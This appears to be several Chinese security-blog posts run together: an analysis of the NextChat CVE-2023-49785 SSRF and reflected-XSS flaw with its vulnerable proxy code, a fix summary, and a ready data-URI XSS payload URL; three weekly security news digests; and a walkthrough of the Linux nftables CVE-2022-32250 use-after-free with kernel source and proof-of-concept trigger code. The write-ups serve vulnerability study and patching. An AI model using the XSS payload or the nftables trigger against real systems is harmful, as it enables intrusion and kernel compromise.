1. 漏洞介绍 日常网上冲浪，突然粗看以为是有关Chat-GPT的CVE披露出来了，但是仔细一看原来是ChatGPT-Next-Web的漏洞。漏洞描述大致如下：（如果有自己搭建了还没更新的速速修复升级防止被人利用，2.11.3已经出来了） NextChat，也称为 ChatGPT-Next-Web，是与 ChatGPT 一起使用的跨平台聊天用户界面。 2.11.2 及之前的版本容易受到服务器端请求伪造和跨站点脚本攻击的影响。2024年3月，互联网上披露CVE-2023-49785,攻击者可在无需登陆的情况下构造恶意请求造成SSRF，造成敏感信息泄漏等。 2. 漏洞分析 定位到漏洞代码：app/api/cors/[...path]/route.ts： 也就是大致如下内容： import { NextRequest, NextResponse } from "next/server"; async function handle(  req: NextRequest, { params }: { params: { path: string[] } }, ) {  if (req.method === "OPTIONS") {    return NextResponse.json({ body: "OK" }, { status: 200 }); }  const [protocol, ...subpath] = params.path;  const targetUrl = `${protocol}://${subpath.join("/")}`;  const method = req.headers.get("method") ?? undefined;  const shouldNotHaveBody = ["get", "head"].includes(    method?.toLowerCase() ?? "", );  const fetchOptions: RequestInit = {    headers: {      authorization: req.headers.get("authorization") ?? "",   },    body: shouldNotHaveBody ? null : req.body,    method,    // @ts-ignore    duplex: "half", };  const fetchResult = await fetch(targetUrl, fetchOptions);  console.log("[Any Proxy]", targetUrl, {    status: fetchResult.status,    statusText: fetchResult.statusText, });  return fetchResult; } 在这段代码中，这里没有做任何的安全防护。params.path 是通过请求参数传入的，这意味着用户可以控制请求的路径部分。这个路径部分会被直接拼接到一个新的 URL 中，并在后续的代码中被用于发起请求，以绕过访问控制、访问内部系统或执行其他攻击。 举个例子，当你访问 /api/cors/https/baidu.com 时，请求将被路由到这段代码中。在这里，protocol 将被设置为 https，subpath 将被设置为 ['baidu.com']。然后，这两部分将被拼接成 https://baidu.com，作为目标 URL。接下来，根据代码的逻辑，将会使用 fetch 发起一个对 https://baidu.com 的请求。这个请求的方法和请求体等信息将根据原始请求中的信息进行配置，然后将响应返回给客户端。 我们验证一下，果然存在。 至于披露着所说的反射型XSS，则完全是因为这里是用的fetch发包，fetch方法也支持 data 协议,且对后续的参数没有过滤限制导致的，所以我们通过参数拼接如下即可实现： /api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydCgiQ1ZFLTIwMjMtNDk3ODUiKTwvc2NyaXB0Pg==%23 3. 总结 没想到一个64.5k star 的项目之前居然对SSRF一点防护都没有做。 /api/cors 端点作为一个开放代理的设计，允许未经身份验证的用户通过它发送任意的 HTTP 请求。这个端点似乎是为了支持将客户端聊天数据保存到 WebDAV 服务器而添加的。 我查看了最新的源代码： 具体的官方修复思路如下： 移除开放代理端点：最终修复方案中，移除了原始的开放代理端点/api/cors。 替换为特定用途的端点：取而代之的是添加了两个新的端点/api/upstash和/api/webdav，这些端点具有特定的用途，分别用于与 Upstash 和 WebDAV 服务进行集成。这种替换的方式限制了端点的功能范围，并提供了更专门化的功能，有助于减少系统的安全风险。 增加安全验证和限制： /api/upstash 限制目标URL：修复代码首先通过检查请求参数中的endpoint来限制目标URL。它要求目标URL必须是以.upstash.io结尾的有效URL，这样就限制了请求只能发送到特定的Upstash服务。 限制请求方法：修复代码还对请求中的操作类型进行了限制。它只允许get和set两种操作类型的请求，如果请求的操作类型不是这两种之一，则会返回403 Forbidden响应。 /api/webdav 请求方法限制： 修复代码只允许特定的HTTP请求方法，包括MKCOL、GET和PUT。对于其他不允许的请求方法，如POST等，会返回403 Forbidden响应。 目标路径验证： 修复代码对于不同的请求方法，会对目标路径进行不同的验证： 对于MKCOL请求，只允许请求目标路径为指定的folder，如果请求的目标路径不是以指定的folder结尾，则返回403 Forbidden响应。 对于GET请求，只允许请求目标路径为指定的fileName，如果请求的目标路径不是以指定的fileName结尾，则返回403 Forbidden响应。 对于PUT请求，同样只允许请求目标路径为指定的fileName，如果请求的目标路径不是以指定的fileName结尾，则返回403 Forbidden响应。

1、APT28组织利用Outlook漏洞攻击捷克和德国实体 https://mzv.gov.cz/jnp/en/issues_and_press/press_releases/statement_of_the_mfa_on_the_cyberattacks.html 捷克和德国周五透露，它们是与俄罗斯有联系的民族国家组织APT28进行的长期网络间谍活动的目标。捷克共和国外交部 (MFA) 在一份声明中表示，该国一些未透露姓名的实体因去年初曝光的 Microsoft Outlook 安全漏洞而遭到攻击。外交部表示：“针对政治实体、国家机构和关键基础设施的网络攻击不仅对国家安全构成威胁，而且破坏了我们自由社会所依赖的民主进程。 ”所涉及的安全漏洞是CVE 2、攻击者滥用微软 Graph API进行隐秘恶意软件通信活动递增 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/graph-api-threats 攻击者越来越多地将Microsoft Graph API武器化以用于恶意目的，以逃避检测。自 2022 年 1 月以来，已观察到多个国家联盟的黑客组织使用 Microsoft Graph API 进行 C&C。其中包括被追踪为APT28、REF2924、Red Stinger、Flea、APT29和OilRig的威胁行为者。第一个已知的 Microsoft Graph API 滥用实例可以追溯到 2021 年 6 3、HPE Aruba设备存在四个严重漏洞面临远程代码执行攻击 https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-004.txt HPE Aruba Networking（以前称为 Aruba Networks）已发布安全更新，以解决影响 ArubaOS 的严重缺陷，这些缺陷可能导致受影响系统上的远程代码执行 (RCE)。在这10 个安全缺陷中，有 4 个缺陷的严重程度被评为严重：CVE-2024-26304、CVE-2024-26305、CVE-2024-33511、CVE-2024-33512。 4、安卓漏洞可能会在启用VPN终止开关的情况下泄漏DNS流量 https://mullvad.net/en/blog/dns-traffic-can-leak-outside-the-vpn-tunnel-on-android Mulvad VPN 用户发现，即使通过“阻止没有 VPN 的连接”选项启用了“始终在线 VPN”功能，Android 设备在切换 VPN 服务器时也会泄漏 DNS 查询。“始终在线 VPN”旨在在设备启动时启动 VPN 服务，并在设备或配置文件打开时保持其运行。启用“阻止没有 VPN 的连接”选项（也称为终止开关）可确保所有网络流量和连接都通过始终连接的 VPN 隧道，从而阻止窥探者监视用户的 Web 活动。即使在最新操作系统 5、西门子软件中的反序列化漏洞可导致远程代码执行 https://claroty.com/team82/research/exploiting-a-classic-deserialization-vulnerability-in-siemens-simatic-energy-manager 研究人员详细介绍了用于监控工业环境中能源消耗的西门子软件中的反序列化漏洞，并将该缺陷归因于这家德国企业集团决定使用已知安全风险的编程方法。西门子在两年前修补了该漏洞（编号为CVE-2022-23450），对于西门子客户来说，时间足够长，可以在对他们发现的缺陷进行详细解释之前应用补丁。西门子 Simatic Energy Manager 中没有采取对策，该 6、研究人员发现遭遇入侵的路由器可以被多个黑客组织同时使用 https://www.trendmicro.com/en_hk/research/24/e/router-roulette.html 当攻击者识别出不安全的路由器时，他们会通过安装恶意软件来渗透它，从而为他们提供持久性、发起分布式拒绝服务 (DDoS) 攻击、隐藏恶意数据等的能力。然而当攻击者发现路由器已被敌对团伙渗透时，研究人员发现有以下两件事之一：一方允许另一方使用受损的基础设施进行收费，或者双方都找到了一种单独的技术来侵入设备并同时使用它。研究人员使用 Ubiquity 的 EdgeRouters 作为互联网路由器的示例，这些路由器同时被多个黑客组织利用，其中一些是国家资助的，另一些 7、研究人员披露针对macOS系统的新信息窃取程序Cuckoo https://www.sentinelone.com/blog/macos-adload-prolific-adware-pivots-just-days-after-apples-xprotect-clampdown/ 研究人员发现了一种针对 Apple macOS 系统的新信息窃取程序，旨在在受感染的主机上建立持久性并充当间谍软件。该恶意软件被称为Cuckoo，是一种通用的 Mach-O 二进制文件，能够在基于 Intel 和 Arm 的 Mac 上运行。目前尚不清楚确切的分发向量，尽管有迹象表明该二进制文件托管在 dumpmedia[.]com、tunesolo[.]com、fone 8、微软披露安卓应用严重漏洞，多个受App安装量超40亿 https://www.freebuf.com/news/400004.html 近日，研究人员披露了一个名为“Dirty Stream”的严重安全漏洞，该漏洞可能影响几款下载总量数十亿的 Android 应用程序。 9、英国成为首个禁止物联网设备默认使用弱密码的国家 https://therecord.media/united-kingdom-bans-defalt-passwords-iot-devices PSTI 明确禁止使用 "admin "或 "12345 "等弱密码或容易被猜到的默认密码，还要求制造商公布联系方式，以便用户报告漏洞。不符合规定的产品可能会被召回，负有责任的公司可能面临最高 1000 万英镑（1253 万美元）的罚款或其全球收入的 4%，以较高者为准。 10、波兰总检察长称前政府使用间谍软件 Pegasus 监视了数百人 https://www.solidot.org/story?sid=78045 总检察长表示间谍软件生成了被监视者“私人和职业生活”的大量信息。他强调波兰政府无法完全控制所收集的数据，因为该系统运行是基于是以色列公司授予的许可证。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 在nftales中存在着集合(sets)，用于存储唯一值的集合。sets 提供了高效地检查一个元素是否存在于集合中的机制，它可以用于各种网络过滤和转发规则。 而CVE-2022-32250漏洞则是由于nftables在处理set时存在uaf的漏洞。 环境搭建 ubuntu20 + QEMU-4.2.1 + Linux-5.15 .config文件 CONFIG_NF_TABLES=y CONFIG_NETFILTER_NETLINK=y CONFIG_E1000=y CONFIG_E1000E=y CONFIG_USER_NS=y，开启命名空间 开启KASAN：make menuconfig --> Kernel hacking -->Memory Debugging --> KASAN 在ubuntu20直接安装的libnftnl版本太低，因此需要去https://www.netfilter.org/projects/libnftnl/index.html中下载 ./configure --prefix=/usr && make sudo make install 漏洞验证 poc:https://seclists.org/oss-sec/2022/q2/159 在运行poc时，KASAN检测出存在uaf漏洞 漏洞原理 从KASAN给出的信息可知，该漏洞与set有关，因此从set的创建到使用进行源码分析。 在nf_tables_newset内首先需要校验集合名、所属的表、集合键值的长度以及集合的ID是否被设置，若这些条件不具备则直接返回。 File: linux-5.15\net\netfilter\nf_tables_api.c 4205: static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info, 4206:    const struct nlattr * const nla[]) 4207: {   ...        //判断创建set的必备条件是否具备 4227: if (nla[NFTA_SET_TABLE] == NULL || 4228:    nla[NFTA_SET_NAME] == NULL || 4229:    nla[NFTA_SET_KEY_LEN] == NULL || 4230:    nla[NFTA_SET_ID] == NULL) 4231: return -EINVAL;   ... 集合通过kvzalloc函数开辟空间 File: linux-5.15\net\netfilter\nf_tables_api.c   ... 4369: set = kvzalloc(alloc_size, GFP_KERNEL); 4370: if (!set) 4371: return -ENOMEM; ... 在成功创建集合后，就会进行初始化的过程，有一个变量需要重点关注，即set->bindings。 File: linux-5.15\net\netfilter\nf_tables_api.c   ...    //对集合做初始化 4390: INIT_LIST_HEAD(&set->bindings); 4391: INIT_LIST_HEAD(&set->catchall_list); 4392: set->table = table; 4393: write_pnet(&set->net, net); 4394: set->ops = ops; 4395: set->ktype = ktype; 4396: set->klen = desc.klen; 4397: set->dtype = dtype; 4398: set->objtype = objtype; 4399: set->dlen = desc.dlen; 4400: set->flags = flags; 4401: set->size = desc.size; 4402: set->policy = policy; 4403: set->udlen = udlen; 4404: set->udata = udata; 4405: set->timeout = timeout; 4406: set->gc_int = gc_int; ... 当初始化完毕之后，会去判断创建集合时，该集合是否有需要创建的表达式。 File: linux-5.15\net\netfilter\nf_tables_api.c ...   //判断是否有表达式需要创建 4416: if (nla[NFTA_SET_EXPR]) { 4417: expr = nft_set_elem_expr_alloc(&ctx, set, nla[NFTA_SET_EXPR]); //表达式的创建 4418: if (IS_ERR(expr)) { 4419: err = PTR_ERR(expr); 4420: goto err_set_expr_alloc; 4421: } 4422: set->exprs[0] = expr; 4423: set->num_exprs++; ... 在代码[1]处会对表达式进行初始化，紧接着在代码[2]处会对表达式的标志位进行校验，当表达式的标志位不具备NFT_EXPR_STATEFUL属性，那么就会跳转到[3]中进行销毁表达式的处理，紧接着返回错误。这里似乎会存在问题，因为代表[1]与[2]是先创建表达式再检验，就会导致任意的表达式被创建。 File: linux-5.15\net\netfilter\nf_tables_api.c 5309: struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx, 5310: const struct nft_set *set, 5311: const struct nlattr *attr) 5312: { 5313: struct nft_expr *expr; 5314: int err; 5315: 5316: expr = nft_expr_init(ctx, attr); --->[1] 5317: if (IS_ERR(expr)) 5318: return expr; 5319: 5320: err = -EOPNOTSUPP; 5321: if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL)) --->[2] 5322: goto err_set_elem_expr; 5323: ... 5334: err_set_elem_expr: 5335: nft_expr_destroy(ctx, expr); --->[3] 5336: return ERR_PTR(err); 5337: } 回顾KASAN的报告，发现该漏洞与表达式nft_lookup有关，因此接下来关注一下lookup表达式初始化的过程。 lookup表达式的结构体如下，可以看到在lookup结构体里存在着binding变量，是上面set会初始化的一个变量。 struct nft_lookup { struct nft_set *set; //集合 u8 sreg; //源寄存器 u8 dreg; //目的寄存器 bool invert; struct nft_set_binding binding; }; nft_set_bing结构体实则是维护了一个双链表。 struct nft_set_binding { struct list_head list; const struct nft_chain *chain; u32 flags; }; nft_lookup_init函数负责初始化lookup表达式，可以看到需要set与源寄存器都存在的情况下才能够完成创建。 File: linux-5.15\net\netfilter\nft_lookup.c 095: static int nft_lookup_init(const struct nft_ctx *ctx, 096:   const struct nft_expr *expr, 097:   const struct nlattr * const tb[]) 098: {   ...        //检测set与源寄存器的值 105: if (tb[NFTA_LOOKUP_SET] == NULL || 106:    tb[NFTA_LOOKUP_SREG] == NULL) 107: return -EINVAL;   ... 紧接着检索需要搜索的set。 File: linux-5.15\net\netfilter\nft_lookup.c ... 109: set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET], 110:    tb[NFTA_LOOKUP_SET_ID], genmask); 111: if (IS_ERR(set)) 112: return PTR_ERR(set); ... 最后在完成了set的搜索后，就会进行一个绑定操作，会将表达式的binging接入的set的binding。 File: linux-5.15\net\netfilter\nft_lookup.c ... 148: err = nf_tables_bind_set(ctx, set, &priv->binding); 149: if (err < 0) 150: return err; ... 首先在绑定之前会校验链表是否是匿名并且非空。 File: linux-5.15\net\netfilter\nf_tables_api.c 4606: int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set, 4607:       struct nft_set_binding *binding) 4608: {   ... 4615: if (!list_empty(&set->bindings) && nft_set_is_anonymous(set)) 4616: return -EBUSY;   ... 在通过上面的检测后，就会将当前表达式的加入到set中， File: linux-5.15\net\netfilter\nf_tables_api.c ... 4643: list_add_tail_rcu(&binding->list, &set->bindings); ... 综上所述，bing的作用实则是维护相同set下的不同的表达式。具体流程如下。 在set创建时，会初始化bindings指向自己本身。 紧接着若有lookup表达式创建，并绑定上述的set时，因此通过set的bingdings，可以检索在当前set上的所有expr。 在上面说过创建表达式的过程中会检测表达式的标志位是否为NFT_EXPR_STATEFUL，如[2]所示 5321: if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL)) --->[2] 5322: goto err_set_elem_expr; 在初始化lookup表达式时，是不会给flags设置值的，因此默认值即为0，因此在创建set的同时创建lookup表达式，lookup表达式的类型是默认为0，是无法绕过检测的。 struct nft_expr_type nft_lookup_type __read_mostly = { .name = "lookup", .ops = &nft_lookup_ops, .policy = nft_lookup_policy, .maxattr = NFTA_LOOKUP_MAX, .owner = THIS_MODULE, }; 那么就会进入销毁表达式[3] 5334: err_set_elem_expr: 5335: nft_expr_destroy(ctx, expr); --->[3] 5336: return ERR_PTR(err); nft_expr_destory函数内除了是否表达式外还会调用nf_tables_expr_destroy函数 File: linux-5.15\net\netfilter\nf_tables_api.c 2823: void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr) 2824: { 2825: nf_tables_expr_destroy(ctx, expr); 2826: kfree(expr); 2827: } 在nf_tables_exor_destroy函数会调用表达式的destroy操作 File: linux-5.15\net\netfilter\nf_tables_api.c 2761: static void nf_tables_expr_destroy(const struct nft_ctx *ctx, 2762:   struct nft_expr *expr) 2763: { 2764: const struct nft_expr_type *type = expr->ops->type; 2765: 2766: if (expr->ops->destroy) 2767: expr->ops->destroy(ctx, expr); //表达式的删除操作 2768: module_put(type->owner); 2769: } nft_lookup_destroy函数内部调用了nf_tables_destroy_set函数 File: linux-5.15\net\netfilter\nft_lookup.c 173: static void nft_lookup_destroy(const struct nft_ctx *ctx, 174:       const struct nft_expr *expr) 175: { 176: struct nft_lookup *priv = nft_expr_priv(expr); 177: 178: nf_tables_destroy_set(ctx, priv->set); 179: } 在nf_tables_destroy_set函数内部中有一个简单的判断，若不成立那么实际上nf_tables_destroy_set不会做任何操作。那么就会造成一个漏洞，若我们创建的表达式lookup已经被绑定在set上，因此list_empty(&set->bindings为0，那么就会导致destroy操作不会执行任何操作。就会将lookup表达式残留在set->bingdings中。 File: linux-5.15\net\netfilter\nf_tables_api.c 4683: void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set) 4684: { 4685: if (list_empty(&set->bindings) && nft_set_is_anonymous(set)) //判断`set->bingings是否为空，以及`set`是否匿名 4686: nft_set_destroy(ctx, set); 4687: } 由于lookup->destory不会执行任何操作，就会导致lookup表达式仍然残留在set->bingdings上，但是由于表达式的标志位不能通过校验，随后该表达式就会被释放。 POC分析 首先创建一个名为set_stable的set，为后续创建lookup表达式做准备。    set_name = "set_stable";    nftnl_set_set_str(set_stable, NFTNL_SET_TABLE, table_name);    nftnl_set_set_str(set_stable, NFTNL_SET_NAME, set_name);    nftnl_set_set_u32(set_stable, NFTNL_SET_KEY_LEN, 1);    nftnl_set_set_u32(set_stable, NFTNL_SET_FAMILY, family);    nftnl_set_set_u32(set_stable, NFTNL_SET_ID, set_id++); 紧接着创建名为set_trigger的set，并同时将标志位设置为NFT_SET_EXPR，那么就能在创建set的同时创建表达式，创建的表达式为lookup表达式，并且搜索的set的名为set_stable，这里需要注意的是，第一个创建的set是为了后续的lookup表达式提供搜索的set，而第二次的set是为了创建set的同时创建lookup表达式，因此第二个set的作用仅仅是为了创建lookup表达式。    set_name = "set_trigger";    nftnl_set_set_str(set_trigger, NFTNL_SET_TABLE, table_name);    nftnl_set_set_str(set_trigger, NFTNL_SET_NAME, set_name);    nftnl_set_set_u32(set_trigger, NFTNL_SET_FLAGS, NFT_SET_EXPR);    nftnl_set_set_u32(set_trigger, NFTNL_SET_KEY_LEN, 1);    nftnl_set_set_u32(set_trigger, NFTNL_SET_FAMILY, family);    nftnl_set_set_u32(set_trigger, NFTNL_SET_ID, set_id);    exprs[exprid] = nftnl_expr_alloc("lookup");    nftnl_expr_set_str(exprs[exprid], NFTNL_EXPR_LOOKUP_SET, "set_stable");    nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1);    // nest the expression into the set    nftnl_set_add_expr(set_trigger, exprs[exprid]); 最后就是触发漏洞，第三次的set同样的也仅仅是为了创建lookup表达式，由于此时名为set_stable的set->bingdings还存在着被释放掉的lookup表达式的指针，因此在第三次创建的时候就会将新创建的lookup表达式链接到上述已经被释放的lookup表达式中，从而导致的uaf漏洞。    set_name = "set_uaf";    nftnl_set_set_str(set_uaf, NFTNL_SET_TABLE, table_name);    nftnl_set_set_str(set_uaf, NFTNL_SET_NAME, set_name);    nftnl_set_set_u32(set_uaf, NFTNL_SET_FLAGS, NFT_SET_EXPR);    nftnl_set_set_u32(set_uaf, NFTNL_SET_KEY_LEN, 1);    nftnl_set_set_u32(set_uaf, NFTNL_SET_FAMILY, family);    nftnl_set_set_u32(set_uaf, NFTNL_SET_ID, set_id);    exprs[exprid] = nftnl_expr_alloc("lookup");    nftnl_expr_set_str(exprs[exprid], NFTNL_EXPR_LOOKUP_SET, "set_stable");    nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1);

1、攻击组织声称入侵白俄罗斯主要安全机构的网络系统 https://www.securityweek.com/hackers-claim-to-have-infiltrated-belarus-main-security-service 一个白俄罗斯攻击组织声称已经渗透到该国主要安全机构的网络，并访问了该机构8600多名员工的人事档案。当局尚未对这一说法发表评论，但该机构的网站在周五呈现一个空白页面，并显示“正在开发中”。攻击组织网络游击队（Belarus Cyber Partisans）在其Telegram页面中发布了该网站管理员、数据库和服务器日志的列表，并称从中获取了超过8600名雇员的个人文件。基于这些数据，网络游击队在Telegra 2、Palo Alto Networks针对严重的防火墙漏洞发布更新 https://security.paloaltonetworks.com/CVE-2024-3400 Palo Alto Networks (PAN) 针对可被利用的最严重漏洞发布更新修复信息。根据更新，该漏洞的编号为 CVE-2024-3400，CVSS 漏洞严重性评分为 10 分（满分 10 分），并且可以允许未经身份验证的威胁参与者在防火墙设备上以 root 权限执行任意代码。该缺陷存在于 PAN-OS 10.2、11.0 和 11.1 中，最初由研究人员发现后于 4 月 12 日披露。PAN 表示，利用此漏洞的攻击数量持续增长，并且“第三方已公开披露了此漏洞的概念证明”。 3、Judge0开源在线代码执行系统存在多个严重沙箱逃逸漏洞 https://tantosec.com/blog/judge0/ Judge0 开源在线代码执行系统中已披露多个严重安全漏洞，攻击者可利用这些漏洞在目标系统上获取代码执行权限。这三个缺陷本质上都很严重，允许“拥有足够访问权限的对手执行沙箱逃逸并获得主机的 root 权限”。Judge0（发音为“judge Zero”）被其维护者描述为“强大的、可扩展的、开源的在线代码执行系统”，可用于构建需要在线代码执行功能的应用程序，例如候选人评估、电子学习，以及在线代码编辑器和 IDE。据其网站称，该服务已被 AlgoDaily、CodeChum 和 PYnative 等 23 家客户使用。2024 4、微软修复了托管Windows环境中BitLocker加密错误的问题 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-behind-incorrect-bitlocker-encryption-errors/ Microsoft 修复了在某些托管 Windows 环境中导致 BitLocker 驱动器加密错误的已知问题。该公司表示，Intune 是受该漏洞影响的 MDM 平台之一，并确认第三方 MDM 解决方案也可能受到影响。目前修复的错误仅影响客户端平台，包括 Windows 11 21H2/22H2/23H2、Windows 10 21H2/22H2 和 Windows 5、Dropbox披露影响所有用户的数字签名服务漏洞 https://www.sec.gov/Archives/edgar/data/1467623/000146762324000024/dbx-20240429.htm 云存储服务提供商 Dropbox 周三披露，Dropbox Sign（以前称为 HelloSign）遭到身份不明的威胁者的攻击，这些威胁参与者访问了与数字签名产品所有用户相关的电子邮件、用户名和常规帐户设置。该公司在向美国证券交易委员会 (SEC) 提交的文件中表示，它于 2024 年 4 月 24 日意识到“未经授权的访问”。Dropbox于 2019 年 1 月宣布计划收购 HelloSign。表格 8-K 文件中表示： 6、Goldoon针对具有十年历史漏洞的D-Link路由器发起攻击 https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices 据观察，一种新型的名为 Goldoon 的僵尸网络针对具有近十年历史的关键安全漏洞的 D-Link 路由器，其目标是利用受感染的设备进行进一步攻击。该漏洞为 CVE-2015-2051（CVSS评分：9.8），影响 D-Link DIR-645 路由器，并允许远程攻击者通过特制的 HTTP 请求执行任意命令。如果目标设备受到损害，攻击者可以获得完全控制权，从而能够提取系统信息，与 C2 服务器建立通信，然后使用这些 7、CISA警告严重的GitLab密码重置漏洞在野外积极利用 https://www.cisa.gov/news-events/alerts/2024/05/01/cisa-adds-one-known-exploited-vulnerability-catalog 美国网络安全和基础设施安全局 (CISA) 已将影响 GitLab 的严重漏洞添加到其已知被利用的漏洞 ( KEV ) 目录中。该漏洞在野外的积极利用。该漏洞的编号为 CVE-2023-7028（CVSS 评分：10.0），该漏洞可能通过向未经验证的电子邮件地址发送密码重置电子邮件来促进帐户被盗。GitLab 在今年 1 月初披露了该缺陷的详细信息，并表示该缺陷是作为 2023 年 5 月 8、研究人员披露新型Cuttlefish恶意软件可劫持路由器连接 https://blog.lumen.com/eight-arms-to-hold-you-the-cuttlefish-malware/ 一种名为 Cuttlefish 的新恶意软件针对小型办公室和家庭办公室 (SOHO) 路由器，其目标是秘密监控通过设备的所有流量，并从 HTTP GET 和 POST 请求收集身份验证数据。这种恶意软件是模块化的，主要目的是窃取从相邻局域网 (LAN) 传输路由器的 Web 请求中发现的身份验证材料。第二个功能使其能够执行 DNS 和 HTTP 劫持，以连接到与内部网络上的通信相关的私有 IP 空间。有源代码证据表明与另一个先前已知的名为 HiatusR 9、攻击者过去五年中在Docker Hub植入了数百万个恶意无镜像仓库 https://jfrog.com/blog/attacks-on-docker-with-millions-of-malicious-repositories-spread-malware-and-phishing-scams/ 研究人员发现了多个针对 Docker Hub 的活动，在过去五年中植入了数百万个恶意“无镜像”仓库。Docker Hub 中超过 400 万个存储库是无镜像的，除了存储库文档之外没有任何内容。更重要的是，该文档与公共仓库没有任何关系。相反，它是一个旨在引诱用户访问网络钓鱼或恶意软件托管网站的网页。在发现的 460 万个无图像 Docker Hub 仓库中，据说其中 10、法国医院CHC-SV称拒绝支付LockBit勒索软件组织的赎金 https://www.bleepingcomputer.com/news/security/french-hospital-chc-sv-refuses-to-pay-lockbit-extortion-demand/ 法国戛纳医院西蒙娜·韦伊医院 (CHC-SV) 宣布收到 Lockbit 3.0 勒索软件团伙的赎金要求，并表示他们拒绝支付赎金。4 月 17 日，这家拥有 840 个床位的医院宣布因网络攻击造成严重运营中断，迫使其所有计算机脱机并重新安排非紧急程序和预约。5 月 30 日，该机构在 X 上宣布，已收到 Lockbit 3.0 勒索软件操作的赎金要求，并将其转发给宪兵队和国 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、GitLab发布安全更新以修复漏洞 https://cybersecuritynews.com/gitlab-account-takeover-flaw GitLab发布了适用于社区版和企业版的安全补丁，建议用户进行升级以修复漏洞。16.9.6、16.10.4和16.11.1之前的版本存在两个安全漏洞：一个是路径遍历漏洞（CVE-2024-2434，CVSS： 8.5），允许未经身份验证的攻击者读取受限制的文件并使应用程序崩溃（DoS）；另一个是存在于项目文件搜索中漏洞（CVE-2024-2829，CVSS：7.5），其中特制的通配符筛选器可触发拒绝服务攻击。16.9.6之前的版本和某些更高版本中包含两个漏洞：第一个漏洞（CV 2、 Keras模型的Lambda层中存在安全漏洞 https://cybersecuritynews.com/lambda-layers-code-execution-supply-chain-ai-ml 在基于TensorFlow的Keras模型的Lambda层中存在一个新的供应链漏洞。此漏洞可能允许攻击者将任意代码注入任何AI/ML应用程序。在Keras 2.13版本之前构建的Lambda层都容易受到此类供应链攻击。攻击者可以向AI/ML开发人员创建和分发受木马攻击的流行模型。如果攻击成功，攻击者可以使用与正在运行的应用程序相同的权限在易受攻击的环境中执行不受信任的任意代码。 3、攻击者声称窃取印度电信公司BSNL的数据 https://thecyberexpress.com/bsnl-data-breach-2 2024年4月24日，一个名为“Perell”攻击者发布了一个据称属于BSNL的数据库。该数据库包含超过290万条记录。去年12月，Perell就曾在黑客论坛中声称窃取了BSNL的敏感数据。由于涉及的数据库数量庞大且具有敏感性，因此无法证实该事件的真实性。目前BSNL官方尚未发表任何官方声明或回应。 4、攻击者声称窃取新加坡在线招聘平台Glints的数据 https://thecyberexpress.com/glints-data-breach 2024年4月22日，一个攻击者在黑客论坛中声称窃取了一个数据库，其中包含与新加坡在线招聘平台Glints相关的员工记录。据称数据泄露包含大约1000条记录，其中包含Glint员工的个人身份信息（PII）。暴露的数据包括敏感详细信息，例如姓名、员工ID、职务、电子邮件地址、出生日期、实际地址、身份证号码，甚至银行账户信息。 5、DragonForce勒索软件可能由泄露的LockBit构建器生成 https://cyble.com/blog/lockbit-blacks-legacy-unraveling-the-dragonforce-ransomware-connection DragonForce勒索组织于2023年11月开始进行勒索攻击活动，并针对受害者采用双重勒索策略。研究人员最近发现了一个基于LOCKBIT Black勒索软件的DragonForce勒索软件样本。LOCKBIT Black是LOCKBIT勒索软件的第三种变体。研究人员对使用泄露的LOCKBIT勒索软件构建器生成的二进制文件和DragonForce勒索软件进行了比较，发现两者在代码结构和功能上存在很大的相似 6、监控无边界，英国将通过《调查权法案》修正案 https://www.freebuf.com/articles/399704.html securitylab网站消息，最近，尽管《调查权法案》修正案受到公民和人权倡导者的强烈反对，但英国现任国王还是对该法案予以批准。这意味着该法案即将获得通过，因为这是英国讨论和协调法案的最后一步。 7、Kaiser Permanente 数据泄露影响 1340 万患者 https://www.securityweek.com/kaiser-permanente-discloses-data-breach-impacting-13-4-million-patients/ 美国医疗保健巨头 Kaiser Permanente 通知 1340 万名现任和前任患者，他们的个人信息已暴露给第三方广告商。 8、新的 R 编程漏洞使项目面临供应链攻击 https://thehackernews.com/2024/04/new-r-programming-vulnerability-exposes.html R 编程语言中发现了一个安全漏洞，威胁参与者可能会利用该漏洞创建恶意 RDS（R 数据序列化）文件，从而在加载和引用时导致代码执行。 9、OKTA 警告在线服务面临前所未有的撞库攻击 https://securityaffairs.com/162464/hacking/okta-warned-spike-credential-stuffing-attacks.html 最近几周，Okta 观察到，在住宅代理服务、先前泄露的凭据列表（“组合列表”）和自动化工具的广泛普及的帮助下，针对在线服务的撞库攻击激增。 10、数千台Qlik Sense服务器受Cactus 勒索软件攻击 https://www.freebuf.com/news/399688.html 在安全研究人员警告 Cactus 勒索软件团伙利用 Qlik Sense 数据分析和商业智能 (BI) 平台中的三个漏洞的近五个月后，许多组织仍在面临该勒索团伙的威胁。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

